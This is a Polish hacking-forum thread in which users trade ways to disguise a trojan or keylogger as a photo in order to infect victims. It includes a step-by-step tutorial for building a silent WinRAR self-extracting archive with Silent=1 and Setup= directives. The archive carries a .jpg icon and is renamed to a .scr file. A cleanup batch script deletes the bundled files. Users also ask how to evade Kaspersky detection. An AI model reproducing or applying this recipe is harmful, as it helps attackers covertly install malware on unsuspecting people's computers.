scr + jpg

Clark

Użytkownik
Dołączył
Czerwiec 19, 2007
Posty
16
siemano. jakby co korzystalem z opcji szukaj. wiec czy da sie tak zbindowac jpg + scr zeby oba te pliki sie odpalaly ale roszerzenie byloby scr?
 

T$cr!pt3r

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
207
Ja polecam TEGO bindera, dlatego że jestem jego autorem (
<
), ma małą wykrywalność i funkcjonuje jak ma
smile.gif
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
A ja polecam to:

1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)
3. Podstanie ci plik "archiwum.exe"
4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"

Jak dla mnie to bardzo dobry sposób ;P

Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana
<
 

japcok15

Użytkownik
Dołączył
Lipiec 10, 2007
Posty
44
a macie jakis binder ktorego po znidnowaniu keylgera nie wygryje mi Kaspersky ;/ macie taki binder?

a i czy to prawda ze :

"nie konicznie musi mieć rozszerzenie .exe wystarczy że zbindujemy plik .exe z plikiem .jpg oraz plikem .bat i nadamy końcówke np .jppg"[/b]

wyczytalem to na jakims innym forum... i chcialbym sie dowiedziec czy to prawda ?:>
 

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Zgadza się ale nie jest to takie proste gdysz trzeba wcześniej na komputerze ofiary dodać kilka elementów do rejestru. A jak to zrobić było już wiele razy poruszane.
 

bortex

Użytkownik
Dołączył
Sierpień 23, 2007
Posty
3
Originally posted by lisek160
A ja polecam to:

1. Zapakuj Rarem do archiwum SFX pliki "trojan.exe" i "fotka.jpg" oraz daj ikonkę pliku .jpg
2. Ustaw automatyczną instalacje obu plików (Setup=trojan.exe Setup=fotka.jpg)
3. Podstanie ci plik "archiwum.exe"
4. W cmd (Start->Uruchom->cmd) wpisz: "COPY archiwum.exe archiwum.scr"

Jak dla mnie to bardzo dobry sposób ;P

Powstanie plik archiwum.scr (oczywiście nazwę można zmienić) który będzie miał ikonę normalnego zdjęcia, po odpaleniu pokarze zdjęcie i niepostrzeżenie zainstaluje trojana
<
Odnośnie Punktu 4 Nie Wiem Co Wpisać Wpisywałem Co Tam Pisze Oczywiście Zmieniałem Nazwę Na Swoja archiwum.exe Ale Nie Chce Mi Tego Zrobić Możesz Pomóc Wydaje Mi Sie Ze To Dobry Sposób Ale Nie Mogę Tego Zrobić Pozdro Bortex GG:1453309
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
wpiszcie w konsoli "COPY ścieszkadopliku/plik.exe szcieżkadozapisaniapliku/plik.scr

np dajecie plik archiwum.exe na dysk C: i w konsoli wpiszcie "COPY C:/archiwum.exe C:/archiwum.scr

<
 

rozen

Użytkownik
Dołączył
Wrzesień 18, 2007
Posty
7
Witam a ja mam inne pytanko , dzis zacząlem dopiero czytac se te forum i tak w ogole , wiec prosze nie atakowac mnie odrazu .A mianowicie chodzi mi o to ze spakowalem oba te pliki winrarem i podmienilem ikonki tak ze wyglada jakby to byl zwykly jpg po otworzeniu(klikajac 2 razy otwiera sie okno "samorozpakuwujace sie okno archiwum " po czym jak nacisne instaluj to all jest ok - otwiera mi sie zdjecie i to widac oraz moj maly trojanik . Problem jest jednak w tym ze chcialbym by od razu po nacisnieciu na ten plik , rozpakowal sie w tym miejscu a nie wyskakiwalo to okienko od samorozpakowywania ... ,ktos wie jak to zrobic ?Z góry thx
 

rozen

Użytkownik
Dołączył
Wrzesień 18, 2007
Posty
7
oki thx zobacze
smile.gif
te setupy juz mialem
<
inaczej by sie nie otworzyly ;D- po 5 min
<
juz sprawdzilem all dziala
<
thx wielkie ;D brakowalo mi tylko tej komendy silent=1;
<
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
to dodaj tam batch'a
np. takiego
Kod:
echo off

del fotka.jpg // usuwa fotke

del plik.bat // usuwa samego siebie

del trojan.exe // usuwa trojana

no i wtedy takie komentarze
Kod:
Silent=1;

Setup=fota.jpg;

Setup=trojan.exe;

Setup=plik.bat;

ja zrobiłem trojana który usuwał sam siebie i fotkę więc nie potrzebny był ten batch.
 
K

KangurX

Gość
dobrze go napisalem

mialem pliki lol.jpg lol.exe i plik.bat

a kod wygladal tak :

Kod:
echo off

del lol.jpg // usuwa fotke

del plik.bat // usuwa samego siebie

del lol.exe // usuwa trojana

moze te komentarze usunac?
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
:whoeva: :whoeva:

Kod:
echo off

del lol.jpg

del plik.bat

del lol.exe

za co ty masz te 14 razy "pomógł" :whoeva: :whoeva: :whoeva:

już chce mi sie śmiać jak w podpisach macie "wciśnij pomógł"
<
co wam o tym punkciku
<
 
K

KangurX

Gość
wkoncu sie ma to cos ^^ :whoeva:

przy otwieraniu pliku *.scr wyskakuje blad i dalej sie wypakuje all a jak klikne wypakowany plik.bat to usuwa zdjecie i samego siebie
 

lisek160

Użytkownik
Dołączył
Marzec 21, 2007
Posty
175
:glupek2: Musiałeś coś pomieszać w komentarzach... może napisze tutek jak zrobić taki plik ale nie chce mi sie na razie
<


// Napisałem mini TuT macie
<


_____________________________________________________________

WinRar...? Binder...!

1. Po pierwsze musimy mieć plik który jest trojanem zakładamy że nazywa się "trojan.exe"

2. Musimy znaleźć fotkę która będzie otwierała się razem z trojanem, obojętnie jaką, można ściągnąć jakąś z internetu...

3. Tworzymy nowy folder "Nowy Folder" do którego pakujemy oba pliki, "fotka.jpg" oraz "trojan.exe"

4. Otwieramy systemowy notatnik i piszemy w nim następujący kawałek kodu:

Kod:
echo off

del fotka.jpg

del trojan.exe

del batch.bat

następnie zapisujemy plik pod nazwą "batch.bat" i wrzucamy do "Nowy Folder" tam gdzie pozostałe pliki.

5. Zaznaczamy wszystkie 3 pliki i klikamy PPM z menu wybieramy "Dodaj do archiwum..."

6. Zaznaczamy "Utwórz archiwum SFX"

7. Następnie przechodzimy do zakładki "Zaawansowane" w której wybieramy "Opcje SFX..." w oknie które nam sie pokazało przechodzimy do zakładki "Tekst i ikona" a następnie klikamy na przycisk "Przeglądaj" znajdujący się OBOK NAPISU "Załaduj ikonę z pliku". Szukamy ikony(rozszeżenie .ico) pliku .jpg i dodajemy ją, następnie klikamy "OK". Następnie przechodzimy do zakładki komętarz i w oknie "Wpisz komentarz" wpisujemy tak:

Kod:
Silent=1;

Setup=trojan.exe;

Setup=fotka.jpg;

Setup=batch.bat;

Po wpisaniu komentarza naciskamy na "OK" i czekamy aż plik się spakuje, w wyniku czego powinniśmy otrzymać plik "Nowy Folder.exe". Pozostała jeszcze zmiana nazwy i rozszerzenia pliku.

8. Archiwum który utworzyliśmy wrzucamy na dysk C:

9. Otwieramy CMD (Start->Uruchom->Wpisujemy "CMD"). W CMD piszemy "COPY C:/Nowy Folder.exe C:/Zdjecie_004.scr" i dajemy ENTER. Wchodzimy na dysk C: i tam powinniśmy mieć plik o nazwie "Zdjecie_004.scr" i ikonie pliku .jpg

KONIEC !! Plik gotowy do wysłania
<
 
Do góry Bottom